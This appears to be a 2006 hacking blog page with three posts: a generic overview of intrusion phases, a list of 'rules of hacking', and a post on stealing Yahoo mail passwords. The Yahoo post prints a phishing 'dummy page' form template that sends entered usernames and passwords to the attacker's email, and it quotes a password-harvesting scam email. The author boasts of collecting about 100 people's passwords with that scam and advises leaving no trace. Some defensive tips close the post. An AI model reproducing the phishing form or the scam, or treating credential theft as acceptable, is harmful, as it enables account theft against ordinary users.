Friday, March 31, 2006

Anatomy Of Hack

There are some generic ways that a hacker follows to hack in to the private network. In this article I described a generic way that has been long followed by the most of the hackers all around the world. Today’s private networks are hard and very much secured from outside so that it becomes very difficult for the hackers to get in to the network, but once you will get a small hole into the corporate firewall certainly you can hack into the network. Since the rest of the internal network is very soft. This is very similar to the egg shell which is very hard from outside but very soft from inside.
Foot printing
the first step that a hacker follows in hacking is Foot printing. Where hacker identifies that the target that he needs to attack. In this step he finds the list of available computers that can be hacked. In this step hacker may enumerate the computers present on his network or he may get the IP of the target system by some other means. He may get the IP of target system from some of the internal employee.


Scanning
In second step hacker scans the target system. Like he scans the ports, finds the MAC-address of the target system

Information Gathering
the third step of hacking is Information Gathering. in this stage hacker tries to get as much information as possible about the target system. he finds the operating system running on the target machine, services running on the target machine that can be exploited and much more. This is the right step for the hacker to get some of the user name that has probably the blank password or a password that can be easily guessed.

Gaining Access
the access gaining step is the next step that a hackers does after the Information gathering phase. He gains access on the target machine by means of some exploits which may be the blank/default password of some user or it may be application vulnerability. Like buffer overflow exploit that has been used by hacker most of the time to gain access on the vulnerable machines. In history the access gained using many technique including XSS (cross site scripting) and SQL injection attack.

Escalating Privilege
In case when the access gained in previous step is not privileged enough, hacker tries to escalate his privileges by means of exploiting the application level vulnerability. This is one of the most difficult phases of the hacking.

Pilfering
once the hacker got the right privilege on the target machine he starts pilfering the required information from the machine. In this phase hacker may harm the target machine.


Denial of Service
when hackers not able to gain access on the target machine or he is not able to escalate his privileges he attacks the system for denial of service. This hacker does when he gets frustrated of the hardness of system. This is not going to benefit the hacker in any sense.

Reference
http://www.microsoft.com/technet/technetmag/issues/2005/01/AnatomyofaHack/




Posted by Admin at 3:41 AM 0 comments
Labels:

Rule of Hacking

There are some rules i believe that must to be followed when you are Hacking.
follow these dont's and do's of hacking.

 Dont's of Hacking
  1. Do not do in same way as others do.
  2. Do not use tool for hacking unless you know its complete working.
  3. Do not leave any trace.
  4. Do not delete or change any data which can harm or causes loss to victim.(Ethically do not harm your victim)
Do's of hacking
  1. Do in all possible ways
Posted by Admin at 1:18 AM 0 comments
Labels:

Wednesday, March 29, 2006

Yahoo Hacking Bot


Hi Guys,
Today I am going to discuss about what I did on last week. Before this let me tell you that I am very much interested in hacking. I mean I want to learn hacking techniques that was used in history by other hackers. In this series, in previous week I was searching about what are all the techniques that were used for the hackers to hack the online web mail accounts like Yahoo.

So I googled and found a very few techniques that were used. The most of the techniques are all known to me like Key-loggers, Dummy pages and Social Engineering. Last week using social engineering technique I got the password of nearly 100 people on the net. Now let me tell you that how these three techniques works and how can you defend yourself.

Key-Loggers

The key loggers are very cheap kind of hacking utility that is used by script kiddies. It’s software that logs every key press on a particular machine. So using this you can record the keys and u can get password of any kind of form based authentication scheme, Irrespective of the authentication technique used by your server program. Form based authentication means the authentication scheme is scheme that takes user name and password from user.

So may be your friend will install a key logger on your machine when you are away from your machine (that is left open). Key loggers are can also be presents on Internet Café Machine.

Dummy Pages

Dummy pages are the false login page that looks very similar to original page and that is having some different Action value. Means it will be a fake HTML form page whose post method will be set to post and action will be configured in such a way that when you submit the information it will be sent to some e-mail Id. This may be the case that you will try to login on these pages and your password will be posted to your friend’s (hacker) email.

Here is a simple example of Dummy page 



<form action="Your SMTP URL" method="POST">
<input type="Hidden" name="to" value="Your email Id">
<input type="Hidden" name="subject" value="Subject of email ">
<input type="text" name="user" value="">
<input type="text" name="pass" value="">
<input type="submit" name="submitbutton" value="">
</form>

Social Engineering

The last method that I come across was a social Engineering which deceives the user by telling them a very easy method to hack yahoo which describes like this.

1.First send a letter to hack_mit_bot@yahoo.com, second within the
Subject heading place the word "Password".
2. Then in the text field place the YahooID of the person that you
want to hack in small letters.
3.Then and place your own yahoo account information such as: "My
login:My password" (a semicolon makes it easier for the bot to
recognize). This way the bot can verify that your account actually
exists. And then supplies you with the password for the person's
account that you want it for. Here is example:

To: hack_mit_bot@yahoo.com
Cc:
Bcc:
Subject: Password

YourYahooID@yahoo.co.in:>

So all the people who want to hack someone Yahoo ID will be hacked itself.

Can you believe this, this method is posted on the internet few years back but still I got many Idiots who sent me their password.

Reality

If anyone a claim that he can get your yahoo password is either dam fool or he is dam intelligent who can really hack the existing algorithms. Why I am telling this because the password stored on the yahoo server is neither exactly your plain password nor its encrypted password, but it’s the hash of your password that can not be decrypted back unless you crack it by some brute force attack. So guys even the yahoo administrator can not get your password.

But if someone still hacking your yahoo mail it’s totally due to your mistake. I mean either you logged on the machine which has keyboard logger or you entered your password on some dummy page.

So be claver enough that someone can not hack your password.

Posted by Admin at 3:20 AM 0 comments
Labels: , ,
Subscribe to: Posts (Atom)